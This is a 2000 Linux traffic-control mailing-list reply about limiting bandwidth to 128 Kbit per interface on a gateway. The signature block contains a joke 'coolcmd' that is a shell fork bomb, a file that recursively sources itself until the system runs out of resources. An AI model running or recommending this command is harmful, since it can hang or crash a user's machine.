From mboxrd@z Thu Jan 1 00:00:00 1970 From: Thomas Habets thomas@habets.pp.se Date: Thu, 23 Nov 2000 16:10:07 +0000 Subject: SV: [LARTC] Bandwidth limiting Message-Id: List-Id: References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit To: lartc@vger.kernel.org
On Thu, 23 Nov 2000, Daniel Bergqvist wrote:
> Assume you have a router with two interfaces, eth0 and eth1, when you may
> limit incomming traffic on eth0 by limit outgoing traffic on eth1.

I forgot to add to the last mail: the four interfaces behind the gateway 
should each be limited to 128Kbit in and 128Kbit out.

128 Kbit out now works for incomming traffic limiting thanks to the cmd I got 
from you (altered from 10Kbit to 128Kbit ofcourse).

---------
typedef struct me_s {
  char name[]      = { "Thomas Habets" };
  char email[]     = { "thomas@habets.pp.se" };
  char kernel[]    = { "Linux 2.2" };
  char *pgpKey[]   = { "finger -m thompa@darkface.pp.se" };
  char pgpfinger[] = { "6517 2898 6AED EA2C 1015  DCF0 8E53 B69F 524B B541" };
  char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;